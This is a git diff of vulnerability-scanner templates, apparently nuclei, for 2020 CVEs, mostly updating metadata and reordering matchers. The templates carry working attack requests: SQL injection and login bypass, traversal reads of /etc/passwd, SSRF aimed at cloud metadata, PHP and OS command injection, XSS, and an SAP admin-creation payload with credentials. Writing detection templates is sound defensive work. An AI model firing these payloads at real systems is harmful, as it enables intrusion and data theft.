cwe-id: CWE-89 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:* - epss-score: 0.00529 + epss-score: 0.01145 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: phpgurukul + product: hospital_management_system_in_php tags: cve2020,hms,cms,sqli,authenticated,edb,cve - variables: num: "999999999" @@ -33,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}password={{password}}&submit=&submit= - - | POST /hospital/hms/doctor/search.php HTTP/1.1 Host: {{Hostname}} @@ -41,9 +41,10 @@ http: searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search= + cookie-reuse: true host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 5bc9d624e6..2009e4c55f 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -14,27 +14,32 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2020-5284 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.00104 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* - epss-score: 0.00122 - tags: cve,cve2020,nextjs,lfi metadata: max-request: 1 + vendor: zeit + product: next.js + tags: cve,cve2020,nextjs,lfi http: - method: GET path: - "{{BaseURL}}/_next/static/../server/pages-manifest.json" + matchers-condition: and matchers: - - type: regex - regex: - - '\{"/_app":".*?_app\.js"' - part: body - type: word + part: header words: - "application/json" - part: header + + - type: regex + part: body + regex: + - '\{"/_app":".*?_app\.js"' + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index bc26642036..e144e45f6a 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5307 cwe-id: CWE-89 - cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:*:*:*:*:*:*:*:* - epss-score: 0.01029 - tags: sqli,edb,cve,cve2020 + epss-score: 0.01326 + cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phpgurukul_dairy_farm_shop_management_system_project + product: phpgurukul_dairy_farm_shop_management_system + tags: sqli,edb,cve,cve2020 http: - raw: diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 9c3cb93388..f8740c8425 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -12,23 +12,27 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 - cwe-id: CWE-22 - cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* + cwe-id: CWE-22,CWE-23 epss-score: 0.00258 - tags: cve,cve2020,lfi,springcloud + cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: vmware + product: spring_cloud_config + tags: cve,cve2020,lfi,springcloud http: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index b7a8eb0d4e..b5485609cd 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -12,12 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-5410 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.97314 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* - epss-score: 0.9712 - tags: cve,cve2020,lfi,springcloud,config,traversal,kev metadata: max-request: 1 + vendor: vmware + product: spring_cloud_config + tags: cve,cve2020,lfi,springcloud,config,traversal,kev http: - method: GET @@ -26,7 +28,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 222d13f7a8..3d935f48a9 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -12,20 +12,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-5412 - cwe-id: CWE-610 + cwe-id: CWE-441,CWE-610 + epss-score: 0.04459 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* - epss-score: 0.03435 - tags: cve,cve2020,ssrf,springcloud metadata: max-request: 1 + vendor: vmware + product: spring_cloud_netflix + tags: cve,cve2020,ssrf,springcloud http: - method: GET path: - "{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}" - # To get crithit, try http://169.254.169.254/latest/metadata/ - matchers-condition: and matchers: - type: word @@ -41,3 +41,5 @@ http: - type: status status: - 200 + +# To get crithit, try http://169.254.169.254/latest/metadata/ diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 338402e613..40e60befbf 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -13,11 +13,13 @@ info: cvss-score: 5.8 cve-id: CVE-2020-5775 cwe-id: CWE-918 - cpe: cpe:2.3:a:instructure:canvas_learning_management_service:*:*:*:*:*:*:*:* - epss-score: 0.00166 - tags: cve,cve2020,ssrf,oast,blind,tenable + epss-score: 0.00189 + cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: instructure + product: canvas_learning_management_service + tags: cve,cve2020,ssrf,oast,blind,tenable http: - method: GET diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index e8f176c1a4..9adacd41fb 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -13,11 +13,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5776 cwe-id: CWE-352 + epss-score: 0.52762 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* - epss-score: 0.53263 metadata: max-request: 3 shodan-query: http.component:"Magento" + vendor: magmi_project + product: magmi tags: magmi,magento,tenable,cve,cve2020 http: @@ -40,6 +42,7 @@ http: GET /magmi/web/info.php HTTP/1.1 Host: {{Hostname}} Connection: close + matchers-condition: and matchers: - type: word @@ -47,6 +50,7 @@ http: - "PHP Extension" - "PHP Version" condition: and + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 002131b07a..64401c02cf 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5777 cwe-id: CWE-287 + epss-score: 0.02505 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* - epss-score: 0.01568 metadata: max-request: 1 shodan-query: http.component:"Magento" + vendor: magmi_project + product: magmi tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass http: @@ -31,9 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Too many connections" - part: body + - type: status status: - 503 diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index 16e1094f0a..4c5484e9c1 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -15,21 +15,25 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5847 cwe-id: CWE-94,CWE-668 + epss-score: 0.97138 cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* - epss-score: 0.97272 metadata: max-request: 1 + vendor: unraid + product: unraid tags: cve,cve2020,rce,kev http: - method: GET path: - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "b13928fbcfff659363d7c7d1ec008d56" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 10130c103d..40d633ad19 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -22,11 +22,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-5902 - cwe-id: CWE-22,CWE-829 - epss-score: 0.97562 - tags: cve2020,bigip,rce,kev,packetstorm,cve + cwe-id: CWE-22 + epss-score: 0.97566 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 + vendor: f5 + product: big-ip_access_policy_manager + tags: cve2020,bigip,rce,kev,packetstorm,cve http: - method: GET @@ -38,10 +41,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" @@ -50,6 +49,10 @@ http: - "HSQL Database Engine Servlet" condition: or + - type: status + status: + - 200 + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 @@ -74,10 +77,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "h3ll0_w0Rld" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 616591780e..80422868f3 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-6171 cwe-id: CWE-79 - cpe: cpe:2.3:a:communilink:clink_office:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: cve,cve2020,xss,clink-office + cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: communilink + product: clink_office + tags: cve,cve2020,xss,clink-office http: - method: GET @@ -28,15 +30,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 44cf9d52a4..ec8b9bd9b9 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -18,11 +18,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6207 cwe-id: CWE-306 - cpe: cpe:2.3:a:sap:solution_manager:*:*:*:*:*:*:*:* epss-score: 0.97442 - tags: cve,cve2020,sap,solman,rce,kev + cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: solution_manager + tags: cve,cve2020,sap,solman,rce,kev http: - raw: @@ -38,20 +40,20 @@ http: matchers-condition: and matchers: - type: word + part: body words: - ":Envelope" - ":Body" - ":getAllAgentInfoResponse" - part: body + condition: and + + - type: word + part: header + words: + - "text/xml" + - "SAP NetWeaver Application Server" condition: and - type: status status: - 200 - - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header - condition: and diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index a0ae249102..e7bfabaf49 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -16,12 +16,14 @@ info: cvss-score: 10 cve-id: CVE-2020-6287 cwe-id: CWE-306 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:* - epss-score: 0.97362 + epss-score: 0.97519 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2020,sap,kev,cisa + vendor: sap + product: netweaver_application_server_java + tags: cve,cve2020,sap,kev http: - raw: @@ -35,24 +37,24 @@ http: CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA== userDetails - # userName - sapRpoc6351 - # password - Secure!PwD8890 - matchers-condition: and matchers: - type: word + part: body words: - "CTCWebServiceSi" - "SOAP-ENV" - part: body condition: and + - type: word + part: header + words: + - "text/xml" + - "SAP NetWeaver Application Server" + - type: status status: - 200 - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header +# userName - sapRpoc6351 +# password - Secure!PwD8890 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 4fe490b727..db1121709f 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -16,11 +16,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-6308 cwe-id: CWE-918 - cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:*:*:*:*:*:*:*:* - epss-score: 0.00264 - tags: cve,cve2020,sap,ssrf,oast,unauth + epss-score: 0.00306 + cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: businessobjects_business_intelligence_platform + tags: cve,cve2020,sap,ssrf,oast,unauth http: - raw: diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 0ebb51c668..76bac71852 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://sourceforge.net/projects/opensis-ce/files/ - https://github.com/OS4ED/openSIS-Responsive-Design/commit/1127ae0bb7c3a2883febeabc6b71ad8d73510de8 + - https://opensis.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-6637 cwe-id: CWE-89 - cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* - epss-score: 0.02214 + epss-score: 0.01772 + cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 shodan-query: http.title:"openSIS" + vendor: os4ed + product: opensis tags: cve,cve2020,sqli,opensis http: @@ -28,11 +31,13 @@ http: - '{{BaseURL}}/account/index.php' - '{{BaseURL}}/opensis/index.php' - '{{BaseURL}}/index.php' - headers: - Content-Type: application/x-www-form-urlencoded + body: | USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log= + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word @@ -41,6 +46,7 @@ http: - 'SQL STATEMENT:' - "UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')" condition: and + - type: word part: header words: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index a7ce121c6d..4b3c649122 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -11,17 +11,21 @@ info: - https://wordpress.org/plugins/ultimate-faqs/ - https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php - https://nvd.nist.gov/vuln/detail/CVE-2020-7107 + - https://wordpress.org/plugins/ultimate-faqs/#developers remediation: Fixed in version 1.8.30. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-7107 cwe-id: CWE-79 - cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:*:*:* epss-score: 0.00517 + cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true + framework: wordpress + vendor: etoilewebdesign + product: ultimate_faq tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp http: diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 9c0ef9ef18..6ba9dd0441 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -16,11 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 + epss-score: 0.05173 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* - epss-score: 0.04874 - tags: cve,cve2020,hp,auth-bypass,hpe,tenable metadata: max-request: 2 + vendor: hpe + product: smart_update_manager + tags: cve,cve2020,hp,auth-bypass,hpe,tenable http: - raw: @@ -31,7 +33,6 @@ http: Content-Type: application/json {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}} - - | GET /session/{{sessionid}}/node/index HTTP/1.1 Host: {{Hostname}} @@ -49,7 +50,7 @@ http: - type: regex name: sessionid group: 1 - internal: true - part: body regex: - '"sessionId":"([a-z0-9.]+)"' + internal: true + part: body diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 0a8a038353..ffe2093953 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -17,11 +17,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 + epss-score: 0.97134 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* - epss-score: 0.97348 - tags: cve,cve2020,rce,packetstorm metadata: max-request: 1 + vendor: hp + product: linuxki + tags: cve,cve2020,rce,packetstorm http: - method: GET @@ -31,6 +33,6 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index 1e21e7b18b..caf9611350 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -17,11 +17,13 @@ info: cvss-score: 4.3 cve-id: CVE-2020-7318 cwe-id: CWE-79 - cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* epss-score: 0.00051 - tags: cve,cve2020,xss,mcafee + cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mcafee + product: epolicy_orchestrator + tags: cve,cve2020,xss,mcafee http: - raw: @@ -32,16 +34,18 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: header words: - "text/html" - part: header + - type: word + part: body words: - "Policy Name" - "'\">" condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 5f945d5139..a6e7b26f7f 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7796 cwe-id: CWE-918 + epss-score: 0.74825 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - epss-score: 0.70272 - tags: cve,cve2020,zimbra,ssrf,oast metadata: max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + tags: cve,cve2020,zimbra,ssrf,oast http: - raw: diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index a70d88ea94..08e90624ea 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -15,10 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-7943 cwe-id: CWE-276 - epss-score: 0.02202 - tags: cve,cve2020,puppet,exposure,puppetdb + epss-score: 0.05993 + cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: puppet + product: puppet_enterprise + tags: cve,cve2020,puppet,exposure,puppetdb http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 2356e5797c..7ab804a96c 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -10,16 +10,19 @@ info: - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 - https://nvd.nist.gov/vuln/detail/CVE-2020-7961 + - http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7961 cwe-id: CWE-502 - cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - epss-score: 0.97464 - tags: cve,cve2020,rce,liferay,kev + epss-score: 0.97475 + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* metadata: max-request: 2 + vendor: liferay + product: liferay_portal + tags: packetstorm,cve,cve2020,rce,liferay,kev http: - raw: @@ -34,17 +37,16 @@ http: payloads: command: - - "systeminfo" # Windows - - "lsb_release -a" # Linux + - "systeminfo" # Windows + - "lsb_release -a" # Linux matchers-condition: and matchers: - - type: regex - condition: or regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" + condition: or - type: status status: @@ -52,7 +54,7 @@ http: extractors: - type: regex - part: body regex: - "Microsoft Windows (.*)" - "Distributor ID: (.*)" + part: body diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 3ddc606ab1..9fe5b2640c 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - cpe: cpe:2.3:a:intelliantech:aptus_web:*:*:*:*:*:*:*:* - epss-score: 0.972 + epss-score: 0.97201 + cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Intellian Aptus Web" + vendor: intelliantech + product: aptus_web tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce http: @@ -34,6 +36,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 11d4ddcefd..fdc4a90771 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -1,4 +1,5 @@ id: CVE-2020-8115 + info: name: Revive Adserver <=5.0.3 - Cross-Site Scripting author: madrobot,dwisiswant0 @@ -15,21 +16,26 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8115 cwe-id: CWE-79 + epss-score: 0.0187 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* - epss-score: 0.02261 - tags: cve,cve2020,xss,hackerone metadata: max-request: 1 + vendor: revive-adserver + product: revive_adserver + tags: cve,cve2020,xss,hackerone + http: - method: GET path: - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex part: body regex: - (?mi)window\.location\.replace\(".*alert\(1337\) + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index f0be714548..bcfcb49256 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -6,7 +6,6 @@ info: severity: high description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials. reference: - - https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ - https://hackerone.com/reports/304805 - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0 - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html @@ -16,10 +15,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 - epss-score: 0.97359 - tags: cve,cve2020,rails,rce,hackerone + epss-score: 0.96961 + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rubyonrails + product: rails + tags: cve,cve2020,rails,rce,hackerone http: - method: GET @@ -28,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 35f14de023..cc484cf49d 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -14,10 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8191 cwe-id: CWE-79 - epss-score: 0.00223 - tags: cve,cve2020,citrix,xss + epss-score: 0.0021 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix,xss http: - raw: @@ -32,15 +35,15 @@ http: 